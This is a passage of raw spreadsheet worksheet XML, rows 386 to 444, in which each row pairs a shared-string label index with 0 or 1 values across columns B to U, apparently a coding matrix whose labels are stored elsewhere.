      <c r="Q386" s="12">
        <v>1</v>
      </c>
      <c r="R386" s="12">
        <v>0</v>
      </c>
      <c r="S386" s="12">
        <v>0</v>
      </c>
      <c r="T386" s="17">
        <v>0</v>
      </c>
      <c r="U386" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="387" spans="1:21" ht="36">
      <c r="A387" s="7" t="s">
        <v>390</v>
      </c>
      <c r="B387" s="1">
        <v>0</v>
      </c>
      <c r="C387" s="12">
        <v>0</v>
      </c>
      <c r="D387" s="9">
        <v>0</v>
      </c>
      <c r="E387" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U387" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="388" spans="1:21">
      <c r="A388" s="7" t="s">
        <v>391</v>
      </c>
      <c r="B388" s="1">
        <v>0</v>
      </c>
      <c r="C388" s="12">
        <v>1</v>
      </c>
      <c r="D388" s="9">
        <v>0</v>
      </c>
      <c r="E388" s="9">
        <v>1</v>
      </c>
      <c r="F388" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U388" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="389" spans="1:21">
      <c r="A389" s="7" t="s">
        <v>392</v>
      </c>
      <c r="B389" s="1">
        <v>0</v>
      </c>
      <c r="C389" s="12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1</v>
      </c>
      <c r="M389" s="1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7">
        <v>0</v>
      </c>
      <c r="U389" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="390" spans="1:21" ht="24">
      <c r="A390" s="7" t="s">
        <v>393</v>
      </c>
      <c r="B390" s="1">
        <v>1</v>
      </c>
      <c r="C390" s="12">
        <v>1</v>
      </c>
      <c r="D390" s="9">
        <v>0</v>
      </c>
      <c r="E390" s="9">
        <v>1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1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1</v>
      </c>
      <c r="S390" s="12">
        <v>0</v>
      </c>
      <c r="T390" s="17">
        <v>0</v>
      </c>
      <c r="U390" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="391" spans="1:21">
      <c r="A391" s="7" t="s">
        <v>394</v>
      </c>
      <c r="B391" s="1">
        <v>1</v>
      </c>
      <c r="C391" s="12">
        <v>0</v>
      </c>
      <c r="D391" s="9">
        <v>0</v>
      </c>
      <c r="E391" s="9">
        <v>0</v>
      </c>
      <c r="F391" s="9">
        <v>1</v>
      </c>
      <c r="G391" s="9">
        <v>0</v>
      </c>
      <c r="H391" s="9">
        <v>1</v>
      </c>
      <c r="I391" s="9">
        <v>0</v>
      </c>
      <c r="J391" s="9">
        <v>0</v>
      </c>
      <c r="K391" s="9">
        <v>0</v>
      </c>
      <c r="L391" s="9">
        <v>0</v>
      </c>
      <c r="M391" s="1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7">
        <v>0</v>
      </c>
      <c r="U391" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="392" spans="1:21">
      <c r="A392" s="7" t="s">
        <v>395</v>
      </c>
      <c r="B392" s="1">
        <v>1</v>
      </c>
      <c r="C392" s="12">
        <v>0</v>
      </c>
      <c r="D392" s="9">
        <v>0</v>
      </c>
      <c r="E392" s="9">
        <v>0</v>
      </c>
      <c r="F392" s="9">
        <v>1</v>
      </c>
      <c r="G392" s="9">
        <v>0</v>
      </c>
      <c r="H392" s="9">
        <v>1</v>
      </c>
      <c r="I392" s="9">
        <v>0</v>
      </c>
      <c r="J392" s="9">
        <v>0</v>
      </c>
      <c r="K392" s="9">
        <v>0</v>
      </c>
      <c r="L392" s="9">
        <v>0</v>
      </c>
      <c r="M392" s="1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7">
        <v>0</v>
      </c>
      <c r="U392" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="393" spans="1:21" ht="24">
      <c r="A393" s="7" t="s">
        <v>396</v>
      </c>
      <c r="B393" s="1">
        <v>1</v>
      </c>
      <c r="C393" s="12">
        <v>0</v>
      </c>
      <c r="D393" s="9">
        <v>0</v>
      </c>
      <c r="E393" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U393" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="394" spans="1:21" ht="24">
      <c r="A394" s="7" t="s">
        <v>397</v>
      </c>
      <c r="B394" s="1">
        <v>1</v>
      </c>
      <c r="C394" s="12">
        <v>1</v>
      </c>
      <c r="D394" s="9">
        <v>0</v>
      </c>
      <c r="E394" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N394" s="12">
        <v>0</v>
      </c>
      <c r="O394" s="12">
        <v>1</v>
      </c>
      <c r="P394" s="12">
        <v>0</v>
      </c>
      <c r="Q394" s="12">
        <v>0</v>
      </c>
      <c r="R394" s="12">
        <v>0</v>
      </c>
      <c r="S394" s="12">
        <v>0</v>
      </c>
      <c r="T394" s="17">
        <v>0</v>
      </c>
      <c r="U394" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="395" spans="1:21" ht="36">
      <c r="A395" s="7" t="s">
        <v>398</v>
      </c>
      <c r="B395" s="1">
        <v>1</v>
      </c>
      <c r="C395" s="12">
        <v>0</v>
      </c>
      <c r="D395" s="9">
        <v>0</v>
      </c>
      <c r="E395" s="9">
        <v>0</v>
      </c>
      <c r="F395" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U395" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="396" spans="1:21">
      <c r="A396" s="7" t="s">
        <v>399</v>
      </c>
      <c r="B396" s="1">
        <v>0</v>
      </c>
      <c r="C396" s="12">
        <v>0</v>
      </c>
      <c r="D396" s="9">
        <v>1</v>
      </c>
      <c r="E396" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U396" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="397" spans="1:21" ht="24">
      <c r="A397" s="7" t="s">
        <v>400</v>
      </c>
      <c r="B397" s="1">
        <v>1</v>
      </c>
      <c r="C397" s="12">
        <v>1</v>
      </c>
      <c r="D397" s="9">
        <v>0</v>
      </c>
      <c r="E397" s="9">
        <v>1</v>
      </c>
      <c r="F397" s="9">
        <v>0</v>
      </c>
      <c r="G397" s="9">
        <v>0</v>
      </c>
      <c r="H397" s="9">
        <v>1</v>
      </c>
      <c r="I397" s="9">
        <v>0</v>
      </c>
      <c r="J397" s="9">
        <v>0</v>
      </c>
      <c r="K397" s="9">
        <v>0</v>
      </c>
      <c r="L397" s="9">
        <v>0</v>
      </c>
      <c r="M397" s="1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1</v>
      </c>
      <c r="T397" s="17">
        <v>0</v>
      </c>
      <c r="U397" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="398" spans="1:21" ht="36">
      <c r="A398" s="7" t="s">
        <v>401</v>
      </c>
      <c r="B398" s="1">
        <v>1</v>
      </c>
      <c r="C398" s="12">
        <v>0</v>
      </c>
      <c r="D398" s="9">
        <v>0</v>
      </c>
      <c r="E398" s="9">
        <v>1</v>
      </c>
      <c r="F398" s="9">
        <v>0</v>
      </c>
      <c r="G398" s="9">
        <v>0</v>
      </c>
      <c r="H398" s="9">
        <v>1</v>
      </c>
      <c r="I398" s="9">
        <v>0</v>
      </c>
      <c r="J398" s="9">
        <v>0</v>
      </c>
      <c r="K398" s="9">
        <v>0</v>
      </c>
      <c r="L398" s="9">
        <v>0</v>
      </c>
      <c r="M398" s="1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7">
        <v>0</v>
      </c>
      <c r="U398" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="399" spans="1:21" ht="36">
      <c r="A399" s="7" t="s">
        <v>402</v>
      </c>
      <c r="B399" s="1">
        <v>1</v>
      </c>
      <c r="C399" s="12">
        <v>1</v>
      </c>
      <c r="D399" s="9">
        <v>0</v>
      </c>
      <c r="E399" s="9">
        <v>1</v>
      </c>
      <c r="F399" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U399" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="400" spans="1:21" ht="24">
      <c r="A400" s="7" t="s">
        <v>403</v>
      </c>
      <c r="B400" s="1">
        <v>0</v>
      </c>
      <c r="C400" s="12">
        <v>0</v>
      </c>
      <c r="D400" s="9">
        <v>0</v>
      </c>
      <c r="E400" s="9">
        <v>0</v>
      </c>
      <c r="F400" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U400" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="401" spans="1:21">
      <c r="A401" s="7" t="s">
        <v>404</v>
      </c>
      <c r="B401" s="1">
        <v>1</v>
      </c>
      <c r="C401" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U401" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="402" spans="1:21" ht="24">
      <c r="A402" s="7" t="s">
        <v>405</v>
      </c>
      <c r="B402" s="1">
        <v>0</v>
      </c>
      <c r="C402" s="12">
        <v>0</v>
      </c>
      <c r="D402" s="9">
        <v>0</v>
      </c>
      <c r="E402" s="9">
        <v>0</v>
      </c>
      <c r="F402" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U402" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="403" spans="1:21" ht="24">
      <c r="A403" s="7" t="s">
        <v>406</v>
      </c>
      <c r="B403" s="1">
        <v>1</v>
      </c>
      <c r="C403" s="12">
        <v>0</v>
      </c>
      <c r="D403" s="9">
        <v>0</v>
      </c>
      <c r="E403" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U403" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="404" spans="1:21">
      <c r="A404" s="7" t="s">
        <v>407</v>
      </c>
      <c r="B404" s="1">
        <v>1</v>
      </c>
      <c r="C404" s="12">
        <v>0</v>
      </c>
      <c r="D404" s="9">
        <v>0</v>
      </c>
      <c r="E404" s="9">
        <v>0</v>
      </c>
      <c r="F404" s="9">
        <v>0</v>
      </c>
      <c r="G404" s="9">
        <v>0</v>
      </c>
      <c r="H404" s="9">
        <v>1</v>
      </c>
      <c r="I404" s="9">
        <v>0</v>
      </c>
      <c r="J404" s="9">
        <v>0</v>
      </c>
      <c r="K404" s="9">
        <v>0</v>
      </c>
      <c r="L404" s="9">
        <v>0</v>
      </c>
      <c r="M404" s="1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7">
        <v>0</v>
      </c>
      <c r="U404" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="405" spans="1:21">
      <c r="A405" s="7" t="s">
        <v>408</v>
      </c>
      <c r="B405" s="1">
        <v>1</v>
      </c>
      <c r="C405" s="12">
        <v>0</v>
      </c>
      <c r="D405" s="9">
        <v>0</v>
      </c>
      <c r="E405" s="9">
        <v>0</v>
      </c>
      <c r="F405" s="9">
        <v>1</v>
      </c>
      <c r="G405" s="9">
        <v>0</v>
      </c>
      <c r="H405" s="9">
        <v>1</v>
      </c>
      <c r="I405" s="9">
        <v>0</v>
      </c>
      <c r="J405" s="9">
        <v>0</v>
      </c>
      <c r="K405" s="9">
        <v>0</v>
      </c>
      <c r="L405" s="9">
        <v>0</v>
      </c>
      <c r="M405" s="1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7">
        <v>0</v>
      </c>
      <c r="U405" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="406" spans="1:21" ht="72">
      <c r="A406" s="7" t="s">
        <v>409</v>
      </c>
      <c r="B406" s="1">
        <v>1</v>
      </c>
      <c r="C406" s="12">
        <v>0</v>
      </c>
      <c r="D406" s="9">
        <v>0</v>
      </c>
      <c r="E406" s="9">
        <v>0</v>
      </c>
      <c r="F406" s="9">
        <v>0</v>
      </c>
      <c r="G406" s="9">
        <v>0</v>
      </c>
      <c r="H406" s="9">
        <v>1</v>
      </c>
      <c r="I406" s="9">
        <v>0</v>
      </c>
      <c r="J406" s="9">
        <v>0</v>
      </c>
      <c r="K406" s="9">
        <v>0</v>
      </c>
      <c r="L406" s="9">
        <v>1</v>
      </c>
      <c r="M406" s="1">
        <v>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7">
        <v>0</v>
      </c>
      <c r="U406" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="407" spans="1:21" ht="24">
      <c r="A407" s="7" t="s">
        <v>410</v>
      </c>
      <c r="B407" s="1">
        <v>1</v>
      </c>
      <c r="C407" s="12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1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7">
        <v>1</v>
      </c>
      <c r="U407" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="408" spans="1:21" ht="84">
      <c r="A408" s="7" t="s">
        <v>411</v>
      </c>
      <c r="B408" s="1">
        <v>0</v>
      </c>
      <c r="C408" s="12">
        <v>0</v>
      </c>
      <c r="D408" s="9">
        <v>0</v>
      </c>
      <c r="E408" s="9">
        <v>1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1</v>
      </c>
      <c r="M408" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U408" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="409" spans="1:21" ht="36">
      <c r="A409" s="7" t="s">
        <v>412</v>
      </c>
      <c r="B409" s="1">
        <v>1</v>
      </c>
      <c r="C409" s="12">
        <v>0</v>
      </c>
      <c r="D409" s="9">
        <v>0</v>
      </c>
      <c r="E409" s="9">
        <v>0</v>
      </c>
      <c r="F409" s="9">
        <v>1</v>
      </c>
      <c r="G409" s="9">
        <v>0</v>
      </c>
      <c r="H409" s="9">
        <v>1</v>
      </c>
      <c r="I409" s="9">
        <v>0</v>
      </c>
      <c r="J409" s="9">
        <v>0</v>
      </c>
      <c r="K409" s="9">
        <v>0</v>
      </c>
      <c r="L409" s="9">
        <v>0</v>
      </c>
      <c r="M409" s="1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7">
        <v>0</v>
      </c>
      <c r="U409" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="410" spans="1:21">
      <c r="A410" s="7" t="s">
        <v>413</v>
      </c>
      <c r="B410" s="1">
        <v>1</v>
      </c>
      <c r="C410" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U410" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="411" spans="1:21">
      <c r="A411" s="7" t="s">
        <v>414</v>
      </c>
      <c r="B411" s="1">
        <v>1</v>
      </c>
      <c r="C411" s="12">
        <v>0</v>
      </c>
      <c r="D411" s="9">
        <v>0</v>
      </c>
      <c r="E411" s="9">
        <v>0</v>
      </c>
      <c r="F411" s="9">
        <v>1</v>
      </c>
      <c r="G411" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U411" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="412" spans="1:21" ht="48">
      <c r="A412" s="7" t="s">
        <v>415</v>
      </c>
      <c r="B412" s="1">
        <v>1</v>
      </c>
      <c r="C412" s="12">
        <v>1</v>
      </c>
      <c r="D412" s="9">
        <v>0</v>
      </c>
      <c r="E412" s="9">
        <v>1</v>
      </c>
      <c r="F412" s="9">
        <v>0</v>
      </c>
      <c r="G412" s="9">
        <v>0</v>
      </c>
      <c r="H412" s="9">
        <v>1</v>
      </c>
      <c r="I412" s="9">
        <v>0</v>
      </c>
      <c r="J412" s="9">
        <v>0</v>
      </c>
      <c r="K412" s="9">
        <v>0</v>
      </c>
      <c r="L412" s="9">
        <v>0</v>
      </c>
      <c r="M412" s="1">
        <v>0</v>
      </c>
      <c r="N412" s="12">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U412" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="413" spans="1:21" ht="72">
      <c r="A413" s="7" t="s">
        <v>416</v>
      </c>
      <c r="B413" s="1">
        <v>0</v>
      </c>
      <c r="C413" s="12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1</v>
      </c>
      <c r="M413" s="1">
        <v>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7">
        <v>0</v>
      </c>
      <c r="U413" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="414" spans="1:21" ht="24">
      <c r="A414" s="7" t="s">
        <v>417</v>
      </c>
      <c r="B414" s="1">
        <v>1</v>
      </c>
      <c r="C414" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U414" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="415" spans="1:21">
      <c r="A415" s="7" t="s">
        <v>418</v>
      </c>
      <c r="B415" s="1">
        <v>1</v>
      </c>
      <c r="C415" s="12">
        <v>0</v>
      </c>
      <c r="D415" s="9">
        <v>0</v>
      </c>
      <c r="E415" s="9">
        <v>0</v>
      </c>
      <c r="F415" s="9">
        <v>1</v>
      </c>
      <c r="G415" s="9">
        <v>0</v>
      </c>
      <c r="H415" s="9">
        <v>1</v>
      </c>
      <c r="I415" s="9">
        <v>0</v>
      </c>
      <c r="J415" s="9">
        <v>0</v>
      </c>
      <c r="K415" s="9">
        <v>0</v>
      </c>
      <c r="L415" s="9">
        <v>0</v>
      </c>
      <c r="M415" s="1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7">
        <v>0</v>
      </c>
      <c r="U415" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="416" spans="1:21">
      <c r="A416" s="7" t="s">
        <v>419</v>
      </c>
      <c r="B416" s="1">
        <v>1</v>
      </c>
      <c r="C416" s="12">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U416" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="417" spans="1:21" ht="36">
      <c r="A417" s="7" t="s">
        <v>420</v>
      </c>
      <c r="B417" s="1">
        <v>0</v>
      </c>
      <c r="C417" s="12">
        <v>0</v>
      </c>
      <c r="D417" s="9">
        <v>0</v>
      </c>
      <c r="E417" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U417" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="418" spans="1:21" ht="24">
      <c r="A418" s="7" t="s">
        <v>421</v>
      </c>
      <c r="B418" s="1">
        <v>0</v>
      </c>
      <c r="C418" s="12">
        <v>0</v>
      </c>
      <c r="D418" s="9">
        <v>0</v>
      </c>
      <c r="E418" s="9">
        <v>1</v>
      </c>
      <c r="F418" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U418" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="419" spans="1:21" ht="24">
      <c r="A419" s="7" t="s">
        <v>422</v>
      </c>
      <c r="B419" s="1">
        <v>1</v>
      </c>
      <c r="C419" s="12">
        <v>0</v>
      </c>
      <c r="D419" s="9">
        <v>0</v>
      </c>
      <c r="E419" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U419" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="420" spans="1:21" ht="24">
      <c r="A420" s="7" t="s">
        <v>423</v>
      </c>
      <c r="B420" s="1">
        <v>1</v>
      </c>
      <c r="C420" s="12">
        <v>0</v>
      </c>
      <c r="D420" s="9">
        <v>0</v>
      </c>
      <c r="E420" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U420" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="421" spans="1:21" ht="24">
      <c r="A421" s="7" t="s">
        <v>424</v>
      </c>
      <c r="B421" s="1">
        <v>1</v>
      </c>
      <c r="C421" s="12">
        <v>0</v>
      </c>
      <c r="D421" s="9">
        <v>0</v>
      </c>
      <c r="E421" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U421" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="422" spans="1:21">
      <c r="A422" s="7" t="s">
        <v>425</v>
      </c>
      <c r="B422" s="1">
        <v>1</v>
      </c>
      <c r="C422" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U422" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="423" spans="1:21">
      <c r="A423" s="7" t="s">
        <v>426</v>
      </c>
      <c r="B423" s="1">
        <v>1</v>
      </c>
      <c r="C423" s="12">
        <v>0</v>
      </c>
      <c r="D423" s="9">
        <v>0</v>
      </c>
      <c r="E423" s="9">
        <v>0</v>
      </c>
      <c r="F423" s="9">
        <v>1</v>
      </c>
      <c r="G423" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U423" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="424" spans="1:21">
      <c r="A424" s="7" t="s">
        <v>427</v>
      </c>
      <c r="B424" s="1">
        <v>1</v>
      </c>
      <c r="C424" s="12">
        <v>1</v>
      </c>
      <c r="D424" s="9">
        <v>0</v>
      </c>
      <c r="E424" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N424" s="12">
        <v>0</v>
      </c>
      <c r="O424" s="12">
        <v>1</v>
      </c>
      <c r="P424" s="12">
        <v>0</v>
      </c>
      <c r="Q424" s="12">
        <v>0</v>
      </c>
      <c r="R424" s="12">
        <v>0</v>
      </c>
      <c r="S424" s="12">
        <v>0</v>
      </c>
      <c r="T424" s="17">
        <v>0</v>
      </c>
      <c r="U424" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="425" spans="1:21">
      <c r="A425" s="7" t="s">
        <v>428</v>
      </c>
      <c r="B425" s="1">
        <v>1</v>
      </c>
      <c r="C425" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U425" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="426" spans="1:21" ht="24">
      <c r="A426" s="7" t="s">
        <v>429</v>
      </c>
      <c r="B426" s="1">
        <v>1</v>
      </c>
      <c r="C426" s="12">
        <v>0</v>
      </c>
      <c r="D426" s="9">
        <v>0</v>
      </c>
      <c r="E426" s="9">
        <v>0</v>
      </c>
      <c r="F426" s="9">
        <v>1</v>
      </c>
      <c r="G426" s="9">
        <v>0</v>
      </c>
      <c r="H426" s="9">
        <v>1</v>
      </c>
      <c r="I426" s="9">
        <v>0</v>
      </c>
      <c r="J426" s="9">
        <v>0</v>
      </c>
      <c r="K426" s="9">
        <v>0</v>
      </c>
      <c r="L426" s="9">
        <v>0</v>
      </c>
      <c r="M426" s="1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7">
        <v>0</v>
      </c>
      <c r="U426" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="427" spans="1:21" ht="48">
      <c r="A427" s="7" t="s">
        <v>430</v>
      </c>
      <c r="B427" s="1">
        <v>1</v>
      </c>
      <c r="C427" s="12">
        <v>1</v>
      </c>
      <c r="D427" s="9">
        <v>0</v>
      </c>
      <c r="E427" s="9">
        <v>1</v>
      </c>
      <c r="F427" s="9">
        <v>0</v>
      </c>
      <c r="G427" s="9">
        <v>0</v>
      </c>
      <c r="H427" s="9">
        <v>1</v>
      </c>
      <c r="I427" s="9">
        <v>0</v>
      </c>
      <c r="J427" s="9">
        <v>0</v>
      </c>
      <c r="K427" s="9">
        <v>0</v>
      </c>
      <c r="L427" s="9">
        <v>0</v>
      </c>
      <c r="M427" s="1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U427" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="428" spans="1:21">
      <c r="A428" s="7" t="s">
        <v>431</v>
      </c>
      <c r="B428" s="1">
        <v>1</v>
      </c>
      <c r="C428" s="12">
        <v>0</v>
      </c>
      <c r="D428" s="9">
        <v>0</v>
      </c>
      <c r="E428" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U428" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="429" spans="1:21">
      <c r="A429" s="7" t="s">
        <v>432</v>
      </c>
      <c r="B429" s="1">
        <v>1</v>
      </c>
      <c r="C429" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U429" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="430" spans="1:21" ht="24">
      <c r="A430" s="7" t="s">
        <v>433</v>
      </c>
      <c r="B430" s="1">
        <v>0</v>
      </c>
      <c r="C430" s="12">
        <v>0</v>
      </c>
      <c r="D430" s="9">
        <v>0</v>
      </c>
      <c r="E430" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U430" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="431" spans="1:21">
      <c r="A431" s="7" t="s">
        <v>434</v>
      </c>
      <c r="B431" s="1">
        <v>0</v>
      </c>
      <c r="C431" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U431" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="432" spans="1:21" ht="24">
      <c r="A432" s="7" t="s">
        <v>435</v>
      </c>
      <c r="B432" s="1">
        <v>1</v>
      </c>
      <c r="C432" s="12">
        <v>0</v>
      </c>
      <c r="D432" s="9">
        <v>0</v>
      </c>
      <c r="E432" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U432" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="433" spans="1:21" ht="36">
      <c r="A433" s="7" t="s">
        <v>436</v>
      </c>
      <c r="B433" s="1">
        <v>0</v>
      </c>
      <c r="C433" s="12">
        <v>0</v>
      </c>
      <c r="D433" s="9">
        <v>0</v>
      </c>
      <c r="E433" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U433" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="434" spans="1:21">
      <c r="A434" s="7" t="s">
        <v>437</v>
      </c>
      <c r="B434" s="1">
        <v>0</v>
      </c>
      <c r="C434" s="12">
        <v>0</v>
      </c>
      <c r="D434" s="9">
        <v>0</v>
      </c>
      <c r="E434" s="9">
        <v>0</v>
      </c>
      <c r="F434" s="9">
        <v>1</v>
      </c>
      <c r="G434" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U434" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="435" spans="1:21" ht="24">
      <c r="A435" s="7" t="s">
        <v>438</v>
      </c>
      <c r="B435" s="1">
        <v>1</v>
      </c>
      <c r="C435" s="12">
        <v>1</v>
      </c>
      <c r="D435" s="9">
        <v>0</v>
      </c>
      <c r="E435" s="9">
        <v>1</v>
      </c>
      <c r="F435" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N435" s="12">
        <v>0</v>
      </c>
      <c r="O435" s="12">
        <v>0</v>
      </c>
      <c r="P435" s="12">
        <v>0</v>
      </c>
      <c r="Q435" s="12">
        <v>1</v>
      </c>
      <c r="R435" s="12">
        <v>0</v>
      </c>
      <c r="S435" s="12">
        <v>0</v>
      </c>
      <c r="T435" s="17">
        <v>0</v>
      </c>
      <c r="U435" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="436" spans="1:21" ht="24">
      <c r="A436" s="7" t="s">
        <v>439</v>
      </c>
      <c r="B436" s="1">
        <v>1</v>
      </c>
      <c r="C436" s="12">
        <v>0</v>
      </c>
      <c r="D436" s="9">
        <v>0</v>
      </c>
      <c r="E436" s="9">
        <v>1</v>
      </c>
      <c r="F436" s="9">
        <v>0</v>
      </c>
      <c r="G436" s="9">
        <v>0</v>
      </c>
      <c r="H436" s="9">
        <v>1</v>
      </c>
      <c r="I436" s="9">
        <v>0</v>
      </c>
      <c r="J436" s="9">
        <v>0</v>
      </c>
      <c r="K436" s="9">
        <v>0</v>
      </c>
      <c r="L436" s="9">
        <v>0</v>
      </c>
      <c r="M436" s="1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7">
        <v>0</v>
      </c>
      <c r="U436" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="437" spans="1:21">
      <c r="A437" s="7" t="s">
        <v>440</v>
      </c>
      <c r="B437" s="1">
        <v>0</v>
      </c>
      <c r="C437" s="12">
        <v>0</v>
      </c>
      <c r="D437" s="9">
        <v>1</v>
      </c>
      <c r="E437" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U437" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="438" spans="1:21" ht="24">
      <c r="A438" s="7" t="s">
        <v>441</v>
      </c>
      <c r="B438" s="1">
        <v>1</v>
      </c>
      <c r="C438" s="12">
        <v>1</v>
      </c>
      <c r="D438" s="9">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U438" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="439" spans="1:21">
      <c r="A439" s="7" t="s">
        <v>442</v>
      </c>
      <c r="B439" s="1">
        <v>1</v>
      </c>
      <c r="C439" s="12">
        <v>0</v>
      </c>
      <c r="D439" s="9">
        <v>0</v>
      </c>
      <c r="E439" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U439" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="440" spans="1:21">
      <c r="A440" s="7" t="s">
        <v>443</v>
      </c>
      <c r="B440" s="1">
        <v>1</v>
      </c>
      <c r="C440" s="12">
        <v>0</v>
      </c>
      <c r="D440" s="9">
        <v>0</v>
      </c>
      <c r="E440" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U440" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="441" spans="1:21" ht="24">
      <c r="A441" s="7" t="s">
        <v>444</v>
      </c>
      <c r="B441" s="1">
        <v>1</v>
      </c>
      <c r="C441" s="12">
        <v>1</v>
      </c>
      <c r="D441" s="9">
        <v>0</v>
      </c>
      <c r="E441" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N441" s="12">
        <v>0</v>
      </c>
      <c r="O441" s="12">
        <v>0</v>
      </c>
      <c r="P441" s="12">
        <v>1</v>
      </c>
      <c r="Q441" s="12">
        <v>0</v>
      </c>
      <c r="R441" s="12">
        <v>0</v>
      </c>
      <c r="S441" s="12">
        <v>0</v>
      </c>
      <c r="T441" s="17">
        <v>0</v>
      </c>
      <c r="U441" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="442" spans="1:21" ht="36">
      <c r="A442" s="7" t="s">
        <v>445</v>
      </c>
      <c r="B442" s="1">
        <v>0</v>
      </c>
      <c r="C442" s="12">
        <v>0</v>
      </c>
      <c r="D442" s="9">
        <v>0</v>
      </c>
      <c r="E442" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U442" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="443" spans="1:21" ht="24">
      <c r="A443" s="7" t="s">
        <v>446</v>
      </c>
      <c r="B443" s="1">
        <v>1</v>
      </c>
      <c r="C443" s="12">
        <v>0</v>
      </c>
      <c r="D443" s="9">
        <v>0</v>
      </c>
      <c r="E443" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U443" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="444" spans="1:21" ht="24">
      <c r="A444" s="7" t="s">
        <v>447</v>
      </c>
      <c r="B444" s="1">
        <v>1</v>
      </c>
      <c r="C444" s="12">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U444" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="445" spans="1:21">
